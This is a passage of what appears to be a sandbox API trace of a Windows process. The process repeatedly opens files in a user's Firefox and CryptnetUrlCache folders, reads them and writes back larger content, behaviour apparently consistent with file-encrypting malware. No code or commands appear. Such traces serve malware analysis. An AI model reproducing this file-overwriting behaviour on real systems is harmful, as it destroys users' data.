| out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0158.331] WriteFile (in: hFile=0x1d4, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0158.331] CloseHandle (hObject=0x1d4) returned 1 [0158.331] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_002_"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0158.333] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0158.333] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x400000 [0158.333] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0158.333] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.334] ReleaseMutex (hMutex=0x168) returned 1 [0158.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="_CACHE_002_", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0158.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="_CACHE_002_", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_CACHE_002_", lpUsedDefaultChar=0x0) returned 11 [0158.334] ReadFile (in: hFile=0x1d4, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0158.337] ReadFile (in: hFile=0x1d4, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0158.339] ReadFile (in: hFile=0x1d4, lpBuffer=0x288f948, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x345f278*=0x2000, lpOverlapped=0x0) returned 1 [0158.339] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3fe000 [0158.339] ReadFile (in: hFile=0x1d4, lpBuffer=0x286da88, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x345f278*=0x2000, lpOverlapped=0x0) returned 1 [0158.340] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3fe000 [0158.341] WriteFile (in: hFile=0x1d4, lpBuffer=0x2875b18*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2875b18*, lpNumberOfBytesWritten=0x345f28c*=0x2588, lpOverlapped=0x0) returned 1 [0163.464] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0163.464] WriteFile (in: hFile=0x1d4, lpBuffer=0x29057d8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x29057d8*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0163.465] WriteFile (in: hFile=0x1d4, lpBuffer=0x29057d8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x29057d8*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0163.466] WriteFile (in: hFile=0x1d4, lpBuffer=0x29057d8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x29057d8*, lpNumberOfBytesWritten=0x345f28c*=0x2000, lpOverlapped=0x0) returned 1 [0163.466] CloseHandle (hObject=0x1d4) returned 1 [0164.075] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0164.077] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0164.077] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xe8 [0164.077] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0164.078] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.078] ReleaseMutex (hMutex=0x168) returned 1 [0164.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="test-phish-simple.sbstore", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0164.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="test-phish-simple.sbstore", cchWideChar=25, lpMultiByteStr=0x1f8fedc, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="test-phish-simple.sbstore", lpUsedDefaultChar=0x0) returned 25 [0164.078] ReadFile (in: hFile=0x204, lpBuffer=0x2697608, nNumberOfBytesToRead=0xe8, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697608*, lpNumberOfBytesRead=0x345f2bc*=0xe8, lpOverlapped=0x0) returned 1 [0164.126] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0164.127] WriteFile (in: hFile=0x204, lpBuffer=0x3cfe828*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3cfe828*, lpNumberOfBytesWritten=0x345f2d0*=0x670, lpOverlapped=0x0) returned 1 [0164.962] CloseHandle (hObject=0x204) returned 1 [0164.962] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0164.963] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0164.964] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1d7 [0164.964] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0164.964] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.964] ReleaseMutex (hMutex=0x168) returned 1 [0164.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0164.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", cchWideChar=65, lpMultiByteStr=0x1fac8c4, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpUsedDefaultChar=0x0) returned 65 [0164.965] ReadFile (in: hFile=0x204, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1d7, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x345f2bc*=0x1d7, lpOverlapped=0x0) returned 1 [0164.966] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0164.966] WriteFile (in: hFile=0x204, lpBuffer=0x286daa8*, nNumberOfBytesToWrite=0x75f, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesWritten=0x345f2d0*=0x75f, lpOverlapped=0x0) returned 1 [0164.966] CloseHandle (hObject=0x204) returned 1 [0164.967] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0165.195] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0165.195] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1d7 [0165.195] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0165.195] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.195] ReleaseMutex (hMutex=0x168) returned 1 [0165.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0165.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", cchWideChar=65, lpMultiByteStr=0x1fac91c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpUsedDefaultChar=0x0) returned 65 [0165.196] ReadFile (in: hFile=0x210, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1d7, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x345f2bc*=0x1d7, lpOverlapped=0x0) returned 1 [0165.197] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0165.197] WriteFile (in: hFile=0x210, lpBuffer=0x286daa8*, nNumberOfBytesToWrite=0x75f, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesWritten=0x345f2d0*=0x75f, lpOverlapped=0x0) returned 1 [0165.197] CloseHandle (hObject=0x210) returned 1 [0165.198] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0165.565] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0165.565] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1d7 [0165.565] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0165.566] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.566] ReleaseMutex (hMutex=0x168) returned 1 [0165.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0165.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", cchWideChar=65, lpMultiByteStr=0x1fac91c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpUsedDefaultChar=0x0) returned 65 [0165.566] ReadFile (in: hFile=0x130, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1d7, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x345f2bc*=0x1d7, lpOverlapped=0x0) returned 1 [0165.567] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0165.567] WriteFile (in: hFile=0x130, lpBuffer=0x286daa8*, nNumberOfBytesToWrite=0x75f, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesWritten=0x345f2d0*=0x75f, lpOverlapped=0x0) returned 1 [0165.568] CloseHandle (hObject=0x130) returned 1 [0165.568] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0165.969] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0165.969] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1cf [0165.970] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0165.970] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.970] ReleaseMutex (hMutex=0x168) returned 1 [0165.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0165.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", cchWideChar=65, lpMultiByteStr=0x1fac91c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpUsedDefaultChar=0x0) returned 65 [0165.970] ReadFile (in: hFile=0x1dc, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x345f2bc*=0x1cf, lpOverlapped=0x0) returned 1 [0165.972] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0165.972] WriteFile (in: hFile=0x1dc, lpBuffer=0x286daa8*, nNumberOfBytesToWrite=0x757, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesWritten=0x345f2d0*=0x757, lpOverlapped=0x0) returned 1 [0165.972] CloseHandle (hObject=0x1dc) returned 1 [0165.973] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0165.974] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0165.974] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x6e3 [0165.974] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0165.974] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.975] ReleaseMutex (hMutex=0x168) returned 1 [0165.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0165.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", cchWideChar=65, lpMultiByteStr=0x1fac91c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpUsedDefaultChar=0x0) returned 65 [0165.975] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663858, nNumberOfBytesToRead=0x6e3, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x345f2bc*=0x6e3, lpOverlapped=0x0) returned 1 [0165.977] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0165.977] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ae208*, nNumberOfBytesToWrite=0xc6b, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25ae208*, lpNumberOfBytesWritten=0x345f2d0*=0xc6b, lpOverlapped=0x0) returned 1 [0165.978] CloseHandle (hObject=0x1dc) returned 1 [0165.978] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0165.980] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0165.980] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1d7 [0165.980] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0165.980] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.980] ReleaseMutex (hMutex=0x168) returned 1 [0165.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0165.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", cchWideChar=65, lpMultiByteStr=0x1fac91c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpUsedDefaultChar=0x0) returned 65 [0165.981] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1d7, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x345f2bc*=0x1d7, lpOverlapped=0x0) returned 1 [0165.982] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0165.982] WriteFile (in: hFile=0x1dc, lpBuffer=0x286daa8*, nNumberOfBytesToWrite=0x75f, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesWritten=0x345f2d0*=0x75f, lpOverlapped=0x0) returned 1 [0165.983] CloseHandle (hObject=0x1dc) returned 1 [0165.983] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0165.985] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0165.985] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x6e3 [0165.985] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0165.985] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.986] ReleaseMutex (hMutex=0x168) returned 1 [0165.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0165.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cchWideChar=65, lpMultiByteStr=0x1fac91c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 